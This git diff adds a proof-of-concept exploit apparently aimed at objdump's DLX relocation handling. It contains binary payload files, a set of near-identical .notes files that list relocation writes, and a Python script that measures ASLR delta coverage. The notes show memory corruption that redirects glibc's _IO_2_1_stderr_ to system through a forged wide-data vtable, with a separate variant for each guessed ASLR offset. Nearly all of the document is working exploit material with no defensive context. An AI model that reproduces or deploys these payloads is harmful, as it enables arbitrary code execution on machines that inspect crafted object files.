b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.bin new file mode 100644 index 0000000..0666622 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes new file mode 100644 index 0000000..84c8d98 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin new file mode 100644 index 0000000..795cdee Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes new file mode 100644 index 0000000..6932c59 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin new file mode 100644 index 0000000..47f529f Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes new file mode 100644 index 0000000..6fe7aff --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin new file mode 100644 index 0000000..d912cc4 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes new file mode 100644 index 0000000..92b2353 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.bin new file mode 100644 index 0000000..98a9e31 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes new file mode 100644 index 0000000..653f33e --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin new file mode 100644 index 0000000..08b387c Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes new file mode 100644 index 0000000..a70a66f --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin new file mode 100644 index 0000000..050c5e9 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes new file mode 100644 index 0000000..db848c5 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin new file mode 100644 index 0000000..05ff644 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes new file mode 100644 index 0000000..a345387 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/tools/aslr_delta_coverage.py b/objdump-dlx-calc-poc/tools/aslr_delta_coverage.py new file mode 100644 index 0000000..8f15052 --- /dev/null +++ b/objdump-dlx-calc-poc/tools/aslr_delta_coverage.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python3 +from collections import Counter + + +STDERR = 0x2044E0 +SYSTEM = 0x58750 +PAGE = 0x1000 + + +def be_from_le32(value): + return int.from_bytes((value & 0xFFFFFFFF).to_bytes(4, "little"), "big") + + +def delta_for_base(base): + src = be_from_le32((base + STDERR) & 0xFFFFFFFF) + dst = be_from_le32((base + SYSTEM) & 0xFFFFFFFF) + return (dst - src) & 0xFFFFFFFF + + +def main(): + counts = Counter(delta_for_base(base) for base in range(0, 1 << 32, PAGE)) + total = sum(counts.values()) + covered = 0 + for delta, count in counts.most_common(): + covered += count + print(f"0x{delta:08x} pages={count} coverage={count / total:.6f} cumulative={covered / total:.6f}") + print(f"unique={len(counts)} total_pages={total}") + + +if __name__ == "__main__": + main()